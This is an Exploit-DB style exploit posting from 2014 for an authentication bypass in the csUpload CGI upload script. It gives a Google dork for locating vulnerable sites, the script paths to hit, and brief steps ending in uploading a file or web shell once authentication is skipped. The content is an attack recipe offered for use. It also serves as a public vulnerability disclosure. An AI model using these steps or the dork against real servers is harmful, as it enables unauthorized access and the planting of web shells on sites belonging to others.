csUpload Script Site - Authentication Bypass

EDB-ID:

32765

CVE:





Platform:

Multiple

Date:

2014-04-09


# Exploit Title: ["csUpload Script Site" Authentication Bypass]
# Google Dork: [CSUpload.cgi?command=]
# Date: 4/9/2014
# Exploit Author: Satanic2000
# Vendor Homepage: http://www.cgiscript.net
# Software Link: http://www.cgiscript.net/cgi-script/csNews/csNews.cgi?database=cgi.db&command=viewone&id=12
# Version: 
# Tested on: linux
# www.Site.com/[path]/CSUpload/CSUpload.cgi
# [path] : /cgi-script/     or /cgi-bin/ or None

# Example:

# 1-  http://localhost/cgi-bin/CSUpload//CSUpload.cgi?command=login

# 2- Bypass Authentication  http://localhost/cgi-bin/CSUpload/CSUpload.cgi

# 3- Select Database Select Databases And Upload (File,Or Shell)

# Special tnx S3Ri0uS . Pejvak . l3l4ck.$c0rpi0n And Other Friend